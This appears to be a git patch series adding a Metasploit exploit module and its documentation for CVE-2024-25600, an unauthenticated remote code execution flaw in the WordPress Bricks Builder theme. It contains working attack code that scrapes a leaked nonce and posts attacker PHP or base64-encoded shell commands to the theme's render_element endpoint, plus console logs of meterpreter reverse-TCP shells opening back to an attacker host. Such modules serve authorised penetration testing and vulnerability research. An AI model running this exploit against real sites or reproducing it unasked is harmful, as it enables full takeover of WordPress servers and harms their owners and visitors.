From f04b66d6dd30b0878cbc75330cd54c46bf1ae3b9 Mon Sep 17 00:00:00 2001 From: Balgogan Date: Mon, 26 Feb 2024 22:07:15 +0100 Subject: [PATCH 01/10] Add wp_bricks_builder_rce --- data/wordlists/wp-exploitable-themes.txt | 1 + .../multi/http/wp_bricks_builder_rce.md | 160 ++++++++++++++++++ .../multi/http/wp_bricks_builder_rce.rb | 130 ++++++++++++++ 3 files changed, 291 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/wp_bricks_builder_rce.md create mode 100644 modules/exploits/multi/http/wp_bricks_builder_rce.rb diff --git a/data/wordlists/wp-exploitable-themes.txt b/data/wordlists/wp-exploitable-themes.txt index e04c39a9e054..49db1b2188dd 100644 --- a/data/wordlists/wp-exploitable-themes.txt +++ b/data/wordlists/wp-exploitable-themes.txt @@ -1,2 +1,3 @@ holding_pattern wplms +bricks diff --git a/documentation/modules/exploit/multi/http/wp_bricks_builder_rce.md b/documentation/modules/exploit/multi/http/wp_bricks_builder_rce.md new file mode 100644 index 000000000000..c2d5f6518c3e --- /dev/null +++ b/documentation/modules/exploit/multi/http/wp_bricks_builder_rce.md @@ -0,0 +1,160 @@ +## Vulnerable Application + +This Metasploit module exploits a Remote Code Execution vulnerability in Bricks Builder Theme, versions prior to 1.9.6. +The vulnerability allows attackers to execute arbitrary PHP code by leveraging +a nonce leakage to bypass authentication and exploit the eval() function usage within the theme. + +To replicate a vulnerable environment for testing: + +1. Install WordPress. +2. Download and install the Bricks Builder Theme, ensuring the version is below 1.9.6. +3. Activate Bricks Builder. +4. Create a model with a default page (to ensure the nonce is on index.php, add some elements). + +## Verification Steps + +1. Set up a WordPress instance with the Bricks Builder Theme (version < 1.9.6). +2. Launch `msfconsole` in your Metasploit framework. +3. Use the module: `use exploit/multi/http/wp_bricks_builder_rce`. +4. Set `RHOSTS` to the local IP address or hostname of the target. +5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`. +6. Execute the exploit using the `run` or `exploit` command. +7. If the target is vulnerable, the module will execute the specified payload. + +## Options + +No option + +## Scenarios + +### Successful Exploitation Against Local WordPress with Bricks Builder Theme 1.8 + +**Setup**: + +- Local WordPress instance with Bricks Builder Theme version 1.8. +- Metasploit Framework. + +**Steps**: + +1. Start `msfconsole`. +2. Load the module: +``` +use exploit/multi/http/wp_bricks_builder_rce +``` +4. Set `RHOSTS` to the local IP (e.g., 192.168.1.10). +5. Configure other necessary options (TARGETURI, SSL, etc.). +6. Launch the exploit: +``` +exploit +``` + +**Expected Results**: + +- The module attempts to retrieve a nonce from the local server. +- It then uploads and executes the payload. +- If successful, control over the local WordPress instance is gained, depending on the payload used. + +**Example**: + +With `cmd/linux/http/x64/meterpreter/reverse_tcp`: + +``` +msf6 > search bricks + +Matching Modules +================ + + # Name Disclosure Date Rank Check Description + - ---- --------------- ---- ----- ----------- + 0 exploit/multi/http/wp_bricks_builder_rce 2024-02-19 excellent Yes Unauthenticated RCE in Bricks Builder Theme + + +Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_bricks_builder_rce + +msf6 > use 0 +[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp +msf6 exploit(multi/http/wp_bricks_builder_rce) > options + +Module options (exploit/multi/http/wp_bricks_builder_rce): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit. + html + RPORT 443 yes The target port (TCP) + SSL true no Negotiate SSL/TLS for outgoing connections + TARGETURI / yes The URI path to WordPress + VHOST no HTTP server virtual host + + +Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) + FETCH_DELETE false yes Attempt to delete the binary after execution + FETCH_FILENAME ilPaBylkCKr no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_SRVHOST no Local IP to use for serving payload + FETCH_SRVPORT 8080 yes Local port to use for serving payload + FETCH_URIPATH no Local URI to use for serving payload + FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces + LHOST 192.168.1.5 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Automatic + + + +View the full module info with the info, or info -d command. + +msf6 exploit(multi/http/wp_bricks_builder_rce) > set ssl false +[!] Changing the SSL option's value may require changing RPORT! +ssl => false +msf6 exploit(multi/http/wp_bricks_builder_rce) > set rhosts localhost +rhosts => localhost +msf6 exploit(multi/http/wp_bricks_builder_rce) > set rport 8888 +rport => 8888 +msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit + +[*] Started reverse TCP handler on 192.168.1.5:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target is vulnerable. +[+] Nonce retrieved: 953563d296 +[*] Sending stage (3045380 bytes) to 172.20.0.2 +[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.20.0.2:39856) at 2024-02-26 21:51:11 +0100 + +meterpreter > sysinfo +Computer : 172.20.0.2 +OS : Debian 11.8 (Linux 6.4.10-060410-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +``` + +With `php/meterpreter/reverse_tcp`: + +``` +msf6 exploit(multi/http/wp_bricks_builder_rce) > set payload php/meterpreter/reverse_tcp +payload => php/meterpreter/reverse_tcp +msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit + +[*] Started reverse TCP handler on 192.168.1.5:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target is vulnerable. +[+] Nonce retrieved: 953563d296 +[*] Sending stage (39927 bytes) to 172.20.0.2 +[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 172.20.0.2:49678) at 2024-02-26 22:02:56 +0100 + +meterpreter > sysinfo +Computer : 65e1e703e433 +OS : Linux 65e1e703e433 6.4.10-060410-generic #202308111154 SMP PREEMPT_DYNAMIC Fri Aug 11 12:00:45 UTC 2023 x86_64 +Meterpreter : php/linux +meterpreter > +``` diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb new file mode 100644 index 000000000000..7f264cd973b5 --- /dev/null +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -0,0 +1,130 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HTTP::Wordpress + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Unauthenticated RCE in Bricks Builder Theme', + 'Description' => %q{ + This module exploits an unauthenticated remote code execution vulnerability in the + Bricks Builder Theme versions <= 1.9.6 for WordPress. The vulnerability allows attackers + to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and + exploit the eval() function usage within the theme. Successful exploitation allows for full + control of the affected WordPress site. It is recommended to upgrade to version 1.9.6.1 or higher. + }, + 'Author' => [ + 'Calvin Alkan', # Vulnerability discovery + 'Valentin Lobstein' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2024-25600'], + ['URL', 'https://github.com/Chocapikk/CVE-2024-25600'], + ['URL', 'https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6'], + ['WPVDB', 'afea4f8c-4d45-4cc0-8eb7-6fa6748158bd'] + ], + 'DisclosureDate' => '2024-02-19', + 'Notes' => { + 'Stability' => [ CRASH_SAFE ], + 'SideEffects' => [ IOC_IN_LOGS ], + 'Reliability' => [ REPEATABLE_SESSION ] + }, + 'DefaultOptions' => { + 'SSL' => true, + 'RPORT' => 443 + }, + 'Platform' => ['unix', 'linux', 'win', 'php'], + 'Arch' => [ARCH_PHP, ARCH_CMD], + 'Targets' => [['Automatic', {}]], + 'Privileged' => false + ) + ) + + register_options([ + OptString.new('TARGETURI', [true, 'The URI path to WordPress', '/']), + ]) + end + + def send_payload(nonce, check) + code_to_add = if check + 'throw new Exception("END");' + elsif payload_instance.arch.include?(ARCH_PHP) + payload.encoded + else + "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));" + end + php_code = "" + + uri = normalize_uri(target_uri.path, 'index.php') + payload_data = { + 'postId' => rand(1..10000).to_s, + 'nonce' => nonce, + 'element' => { + 'name' => 'code', + 'settings' => { + 'executeCode' => 'true', + 'code' => php_code + } + } + }.to_json + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'ctype' => 'application/json', + 'data' => payload_data, + 'vars_get' => { + 'rest_route' => '/bricks/v1/render_element' + } + ) + + return nil unless res && res.code == 200 + + check ? !res.body.match(/Exception: (.*?)END/).nil? : res.body + end + + def fetch_nonce + uri = normalize_uri(target_uri.path) + res = send_request_cgi('method' => 'GET', 'uri' => uri) + return nil unless res&.code == 200 + + script_tag_match = res.body.match(%r{}) + return nil unless script_tag_match + + script_content = script_tag_match[1] + nonce_match = script_content.match(/"nonce":"([a-f0-9]+)"/) + nonce_match ? nonce_match[1] : nil + end + + def exploit + return unless wordpress_and_online? + + nonce = fetch_nonce or begin + print_error('Failed to retrieve nonce. Exiting...') + return + end + + print_good("Nonce retrieved: #{nonce}") + send_payload(nonce, false) + end + + def check + return CheckCode::Unknown unless wordpress_and_online? + + nonce = fetch_nonce + return CheckCode::Unknown unless nonce + return CheckCode::Vulnerable if send_payload(nonce, true) + + CheckCode::Safe + end +end From 9f87510b50035e55f0657be017ee5bf266cfbfa5 Mon Sep 17 00:00:00 2001 From: Balgogan Date: Wed, 28 Feb 2024 20:02:31 +0100 Subject: [PATCH 02/10] Optimize code structure and enhance vulnerability check --- .../multi/http/wp_bricks_builder_rce.rb | 42 +++++++++---------- 1 file changed, 19 insertions(+), 23 deletions(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index 7f264cd973b5..e9386eeb603f 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -49,20 +49,16 @@ def initialize(info = {}) 'Privileged' => false ) ) - - register_options([ - OptString.new('TARGETURI', [true, 'The URI path to WordPress', '/']), - ]) end - def send_payload(nonce, check) - code_to_add = if check - 'throw new Exception("END");' - elsif payload_instance.arch.include?(ARCH_PHP) - payload.encoded - else - "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));" - end + def send_payload(nonce) + code_to_add = + if payload_instance.arch.include?(ARCH_PHP) + payload.encoded + else + "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));" + end + php_code = "" uri = normalize_uri(target_uri.path, 'index.php') @@ -107,24 +103,24 @@ def fetch_nonce end def exploit - return unless wordpress_and_online? - - nonce = fetch_nonce or begin - print_error('Failed to retrieve nonce. Exiting...') - return - end + nonce = fetch_nonce + return print_error('Failed to retrieve nonce. Exiting...') unless nonce print_good("Nonce retrieved: #{nonce}") - send_payload(nonce, false) + send_payload(nonce) end def check return CheckCode::Unknown unless wordpress_and_online? - nonce = fetch_nonce - return CheckCode::Unknown unless nonce - return CheckCode::Vulnerable if send_payload(nonce, true) + wp_version = wordpress_version + print_status("WordPress Version: #{wp_version}") if wp_version + + theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1') + return CheckCode::Safe unless theme_check_code.code == 'appears' - CheckCode::Safe + theme_version = theme_check_code.details[:version] + print_good("Detected Bricks theme version: #{theme_version}") + CheckCode::Appears end end From b3d45f7d9bd466c0eb157b0dc5d9644725966430 Mon Sep 17 00:00:00 2001 From: Balgogan Date: Wed, 28 Feb 2024 20:16:14 +0100 Subject: [PATCH 03/10] Fix oversight and further optimize code execution --- .../multi/http/wp_bricks_builder_rce.rb | 59 +++++++------------ 1 file changed, 20 insertions(+), 39 deletions(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index e9386eeb603f..80f162579829 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -51,44 +51,6 @@ def initialize(info = {}) ) end - def send_payload(nonce) - code_to_add = - if payload_instance.arch.include?(ARCH_PHP) - payload.encoded - else - "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));" - end - - php_code = "" - - uri = normalize_uri(target_uri.path, 'index.php') - payload_data = { - 'postId' => rand(1..10000).to_s, - 'nonce' => nonce, - 'element' => { - 'name' => 'code', - 'settings' => { - 'executeCode' => 'true', - 'code' => php_code - } - } - }.to_json - - res = send_request_cgi( - 'method' => 'POST', - 'uri' => uri, - 'ctype' => 'application/json', - 'data' => payload_data, - 'vars_get' => { - 'rest_route' => '/bricks/v1/render_element' - } - ) - - return nil unless res && res.code == 200 - - check ? !res.body.match(/Exception: (.*?)END/).nil? : res.body - end - def fetch_nonce uri = normalize_uri(target_uri.path) res = send_request_cgi('method' => 'GET', 'uri' => uri) @@ -107,7 +69,26 @@ def exploit return print_error('Failed to retrieve nonce. Exiting...') unless nonce print_good("Nonce retrieved: #{nonce}") - send_payload(nonce) + + send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'ctype' => 'application/json', + 'data' => { + 'postId' => rand(1..10000).to_s, + 'nonce' => nonce, + 'element' => { + 'name' => 'code', + 'settings' => { + 'executeCode' => 'true', + 'code' => "" + } + } + }.to_json, + 'vars_get' => { + 'rest_route' => '/bricks/v1/render_element' + } + ) end def check From 45ae984dc12be885722c5d1d66ec555da0776cf0 Mon Sep 17 00:00:00 2001 From: Balgogan Date: Wed, 28 Feb 2024 20:30:58 +0100 Subject: [PATCH 04/10] Add additional verification step --- modules/exploits/multi/http/wp_bricks_builder_rce.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index 80f162579829..a4d5611eb331 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -98,10 +98,12 @@ def check print_status("WordPress Version: #{wp_version}") if wp_version theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1') + return CheckCode::Unknown unless theme_check_code return CheckCode::Safe unless theme_check_code.code == 'appears' theme_version = theme_check_code.details[:version] print_good("Detected Bricks theme version: #{theme_version}") CheckCode::Appears end + end From 1f05f9a0f165987105459680b67b7df844526717 Mon Sep 17 00:00:00 2001 From: Balgogan Date: Fri, 1 Mar 2024 14:36:13 +0100 Subject: [PATCH 05/10] Add recommendation --- modules/exploits/multi/http/wp_bricks_builder_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index a4d5611eb331..d76fc5309988 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -66,7 +66,7 @@ def fetch_nonce def exploit nonce = fetch_nonce - return print_error('Failed to retrieve nonce. Exiting...') unless nonce + fail_with(Failure::NoAccess, 'Failed to retrieve nonce. Exiting...') unless nonce print_good("Nonce retrieved: #{nonce}") From 85e27b0bc3dd1065eebe4eb5298415366845976d Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Tue, 26 Mar 2024 20:39:04 +0100 Subject: [PATCH 06/10] Update modules/exploits/multi/http/wp_bricks_builder_rce.rb Co-authored-by: jheysel-r7 --- .../multi/http/wp_bricks_builder_rce.rb | 30 ++++++++++++++++++- 1 file changed, 29 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index d76fc5309988..80a88504a7fe 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -45,7 +45,35 @@ def initialize(info = {}) }, 'Platform' => ['unix', 'linux', 'win', 'php'], 'Arch' => [ARCH_PHP, ARCH_CMD], - 'Targets' => [['Automatic', {}]], + 'Targets' => [ + [ + 'PHP In-Memory', + { + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }, + 'Type' => :php_memory + } + ], + [ + 'Unix In-Memory', + { + 'Platform' => ['unix', 'linux'], + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp' }, + 'Type' => :unix_memory + } + ], + [ + 'Windows In-Memory', + { + 'Platform' => 'win', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' }, + 'Type' => :win_memory + } + ], + ], 'Privileged' => false ) ) From 8a1290c8a6cf9a5a0b5937e45d3a74712c063ecb Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Tue, 26 Mar 2024 20:39:23 +0100 Subject: [PATCH 07/10] Update modules/exploits/multi/http/wp_bricks_builder_rce.rb Co-authored-by: jheysel-r7 --- modules/exploits/multi/http/wp_bricks_builder_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index 80a88504a7fe..d7a0aef36869 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -120,7 +120,7 @@ def exploit end def check - return CheckCode::Unknown unless wordpress_and_online? + return CheckCode::Unknown('WordPress does not appear to be online.') unless wordpress_and_online? wp_version = wordpress_version print_status("WordPress Version: #{wp_version}") if wp_version From 672036f53ae9d728fbc3284e73a321973a96f9e3 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Tue, 26 Mar 2024 20:39:33 +0100 Subject: [PATCH 08/10] Update modules/exploits/multi/http/wp_bricks_builder_rce.rb Co-authored-by: jheysel-r7 --- modules/exploits/multi/http/wp_bricks_builder_rce.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index d7a0aef36869..ccee7c8838cc 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -126,8 +126,9 @@ def check print_status("WordPress Version: #{wp_version}") if wp_version theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1') - return CheckCode::Unknown unless theme_check_code - return CheckCode::Safe unless theme_check_code.code == 'appears' + return CheckCode::Unknown('The Brick Builders theme does not appear to be installed') unless theme_check_code + return CheckCode::Detected('The Brick Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected' + return CheckCode::Safe("The Brick Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears' theme_version = theme_check_code.details[:version] print_good("Detected Bricks theme version: #{theme_version}") From abc39e86f9fd2058632580282b1a2b9187e4a4d1 Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Tue, 26 Mar 2024 20:40:04 +0100 Subject: [PATCH 09/10] Update modules/exploits/multi/http/wp_bricks_builder_rce.rb Co-authored-by: jheysel-r7 --- modules/exploits/multi/http/wp_bricks_builder_rce.rb | 4 ---- 1 file changed, 4 deletions(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index ccee7c8838cc..a10e4098b1e2 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -39,10 +39,6 @@ def initialize(info = {}) 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] }, - 'DefaultOptions' => { - 'SSL' => true, - 'RPORT' => 443 - }, 'Platform' => ['unix', 'linux', 'win', 'php'], 'Arch' => [ARCH_PHP, ARCH_CMD], 'Targets' => [ From b9b4a624d94c66d66abc3542694e047d0a9a34c3 Mon Sep 17 00:00:00 2001 From: Balgogan Date: Tue, 26 Mar 2024 21:05:35 +0100 Subject: [PATCH 10/10] Fix typos --- modules/exploits/multi/http/wp_bricks_builder_rce.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/wp_bricks_builder_rce.rb b/modules/exploits/multi/http/wp_bricks_builder_rce.rb index a10e4098b1e2..526cf374123b 100644 --- a/modules/exploits/multi/http/wp_bricks_builder_rce.rb +++ b/modules/exploits/multi/http/wp_bricks_builder_rce.rb @@ -122,12 +122,12 @@ def check print_status("WordPress Version: #{wp_version}") if wp_version theme_check_code = check_theme_version_from_style('bricks', '1.9.6.1') - return CheckCode::Unknown('The Brick Builders theme does not appear to be installed') unless theme_check_code - return CheckCode::Detected('The Brick Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected' - return CheckCode::Safe("The Brick Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears' + return CheckCode::Unknown('The Bricks Builder theme does not appear to be installed') unless theme_check_code + return CheckCode::Detected('The Bricks Builder theme is running but the version was unable to be determined') if theme_check_code.code == 'detected' + return CheckCode::Safe("The Bricks Builder is running version: #{theme_check_code.details[:version]}, which is not vulnerable.") unless theme_check_code.code == 'appears' theme_version = theme_check_code.details[:version] - print_good("Detected Bricks theme version: #{theme_version}") + print_good("Detected Bricks Builder theme version: #{theme_version}") CheckCode::Appears end